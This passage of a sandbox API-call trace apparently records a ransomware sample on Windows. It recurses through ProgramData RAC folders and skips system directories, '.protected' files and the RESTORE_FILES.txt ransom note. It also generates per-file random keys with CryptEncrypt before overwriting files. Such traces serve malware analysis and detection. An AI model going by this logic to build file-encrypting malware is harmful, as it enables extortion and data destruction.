(lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.222] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.222] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt") returned 83 [0093.222] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.222] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.222] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="Windows") returned -1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="Program Files") returned 1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.222] lstrcmpiW (lpString1="tokens.dat.protected", lpString2="System Volume Information") returned 1 [0093.222] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.protected") returned 86 [0093.222] StrStrIW (lpFirst="tokens.dat.protected", lpSrch=".protected") returned=".protected" [0093.222] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.222] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.222] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt") returned 83 [0093.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.223] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="Windows") returned -1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="Program Files") returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="Program Files (x86)") returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="$Recycle.bin") returned 1 [0093.223] lstrcmpiW (lpString1="RAC", lpString2="System Volume Information") returned -1 [0093.223] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC") returned 36 [0093.223] lstrcmpW (lpString1="RAC", lpString2=".") returned 1 [0093.223] lstrcmpW (lpString1="RAC", lpString2="..") returned 1 [0093.223] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*") returned 38 [0093.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\.") returned 38 [0093.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.224] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.224] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.224] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.224] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.224] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.224] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\..") returned 39 [0093.224] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.224] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.224] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="Windows") returned -1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="Program Files") returned -1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="Program Files (x86)") returned -1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="$Recycle.bin") returned 1 [0093.224] lstrcmpiW (lpString1="Outbound", lpString2="System Volume Information") returned -1 [0093.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned 45 [0093.224] lstrcmpW (lpString1="Outbound", lpString2=".") returned 1 [0093.224] lstrcmpW (lpString1="Outbound", lpString2="..") returned 1 [0093.224] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*") returned 47 [0093.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.225] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\.") returned 47 [0093.225] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\..") returned 48 [0093.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.225] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt") returned 63 [0093.225] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.225] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.225] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt") returned 63 [0093.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\outbound\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.225] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.225] lstrcmpiW (lpString1="PublishedData", lpString2="Windows") returned -1 [0093.225] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files") returned 1 [0093.226] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files (x86)") returned 1 [0093.226] lstrcmpiW (lpString1="PublishedData", lpString2="$Recycle.bin") returned 1 [0093.226] lstrcmpiW (lpString1="PublishedData", lpString2="System Volume Information") returned -1 [0093.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned 50 [0093.226] lstrcmpW (lpString1="PublishedData", lpString2=".") returned 1 [0093.226] lstrcmpW (lpString1="PublishedData", lpString2="..") returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*") returned 52 [0093.226] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.226] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.226] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.226] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.226] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\.") returned 52 [0093.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.226] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\..") returned 53 [0093.226] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.226] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.226] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned 69 [0093.226] StrStrIW (lpFirst="RacWmiDatabase.sdf", lpSrch=".protected") returned 0x0 [0093.226] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0093.226] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.226] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.226] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.226] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.226] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.227] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.227] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.227] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.227] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt") returned 68 [0093.227] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.227] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.227] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.227] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.227] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt") returned 68 [0093.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.228] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\RESTORE_FILES.txt") returned 54 [0093.228] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.228] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.228] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="Windows") returned -1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="Program Files") returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="Program Files (x86)") returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1="StateData", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned 46 [0093.228] lstrcmpW (lpString1="StateData", lpString2=".") returned 1 [0093.228] lstrcmpW (lpString1="StateData", lpString2="..") returned 1 [0093.228] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*") returned 48 [0093.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.228] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.228] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.228] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.228] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\.") returned 48 [0093.228] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.228] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.228] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.228] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.228] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.228] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.228] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.228] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\..") returned 49 [0093.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.229] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Windows") returned -1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files") returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files (x86)") returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="$Recycle.bin") returned 1 [0093.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="System Volume Information") returned -1 [0093.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned 62 [0093.229] StrStrIW (lpFirst="RacDatabase.sdf", lpSrch=".protected") returned 0x0 [0093.229] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0093.229] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.229] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.229] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Windows") returned -1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files") returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files (x86)") returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="$Recycle.bin") returned 1 [0093.229] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="System Volume Information") returned -1 [0093.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat") returned 62 [0093.229] StrStrIW (lpFirst="RacMetaData.dat", lpSrch=".protected") returned 0x0 [0093.229] lstrcmpW (lpString1="RacMetaData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0093.229] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.229] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.229] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="Windows") returned -1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="Program Files") returned 1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="System Volume Information") returned -1 [0093.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.protected") returned 80 [0093.229] StrStrIW (lpFirst="RacWmiDataBookmarks.dat.protected", lpSrch=".protected") returned=".protected" [0093.230] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Windows") returned -1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files") returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files (x86)") returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="$Recycle.bin") returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="System Volume Information") returned -1 [0093.230] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat") returned 66 [0093.230] StrStrIW (lpFirst="RacWmiEventData.dat", lpSrch=".protected") returned 0x0 [0093.230] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0093.230] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.230] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.230] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.230] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt") returned 64 [0093.230] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.230] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.230] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.230] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt") returned 64 [0093.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.231] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0093.231] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp") returned 41 [0093.231] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0093.231] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0093.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*") returned 43 [0093.231] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.231] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.231] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.231] lstrcmpiW (lpString1=".", 